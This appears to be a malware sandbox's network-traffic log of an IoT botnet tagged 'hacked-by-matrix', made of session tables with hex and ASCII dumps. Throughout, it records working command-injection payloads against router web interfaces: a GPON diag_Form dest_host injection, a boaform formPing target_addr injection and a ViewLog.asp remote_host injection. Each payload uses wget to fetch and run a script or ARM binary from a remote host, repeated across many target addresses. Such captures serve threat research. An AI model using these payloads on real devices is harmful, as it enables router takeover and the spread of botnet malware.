                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.133538042.202.87.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496413946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.1336002118.57.116.184443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496416092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.1354336109.227.104.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496426105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.1356972109.94.63.65443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496447086 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.134809842.88.166.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496464968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.1352194118.113.229.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496464968 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.134890242.254.189.150443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496483088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.135888642.197.200.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496485949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.1334278109.227.106.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496515036 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.1358032109.255.99.117443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496539116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.13442845.149.123.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496540070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.13548945.151.58.222443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496565104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.1354352118.51.218.128443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496607065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.1339542109.53.218.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:11.496618032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.135860262.29.31.2341723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:12.120054007 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.1352032213.190.5.24780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:12.619097948 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:12.939798117 CET1286INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Keep-Alive: timeout=5, max=100
                                                        content-type: text/html
                                                        last-modified: Tue, 25 Jun 2019 07:01:36 GMT
                                                        etag: "999-5d11c6d0-22a3701833ded0e1;gz"
                                                        accept-ranges: bytes
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        content-length: 1159
                                                        date: Thu, 21 Mar 2024 04:22:12 GMT
                                                        server: LiteSpeed
                                                        platform: hostinger
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8d 73 63 71 10 b6 bb af be e1 60 49 5a 9a 65 2c 8d 68 63 8c fb 1d 67 fd b8 bf 4d 5a 68 ee 5d ca 12 d8 b2
                                                        Data Ascii: Vm6_l5utFbldK^ ;ob|HQE*go|<]d"Xfy*59>J3^PRpvwUKy,qfMZ#1rvr.O['Yl'NTXcC-2H[Wureg'<0G#>v1E^/cyZ.t%#<<0QuOk,D61bQg5i.tX(W0'!yHzHne=6"cm`;I@SIQ3m4GT7z~g2A&Ut59"D^De8dxh<vF>'^%oL:<&+PZj$0i'1#M@%Nbu+}Ed8NwoANXjF\(cStW(k,,[GftBncRX@YTE*Dxot_#t7:IhV;?MO&}o~F{~CMj]5O,>2dY?0(~eaP"LL{.fd!C]l21]izA=w6/;{YoH^77Yj\~[*F?h\q0@Ra<S3o7jz}q`Rpk-RgEQN0Sscq`IZe,hcgMZh]
                                                        Mar 21, 2024 05:22:12.939815998 CET260INData Raw: d3 26 6e 3f fb e2 fa 71 bf 84 fe 70 b2 6f 07 25 0c fa dd ae fa 31 eb 7f 7a 95 9c 3c 7b fa fc e9 cb 17 2f 93 27 cf 82 04 16 de 04 83 43 bc 43 2d 83 2e 14 48 28 e0 9d c3 9c 6f 53 99 f3 ee 36 e9 e5 33 23 d7 db 44 4b ba 66 42 81 73 45 d4 1e fb 88 91
                                                        Data Ascii: &n?qpo%1z<{/'CC-.H(oS63#DKfBsE~NoQyU.!jje4.Y{6me4$b%m I[.X]Mao1BK6Nbpk&h,yE.,gP>f_3 XxF-3d44<rI{fMr
                                                        Mar 21, 2024 05:22:12.939882040 CET932INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Thu, 21 Mar 2024 04:22:12 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 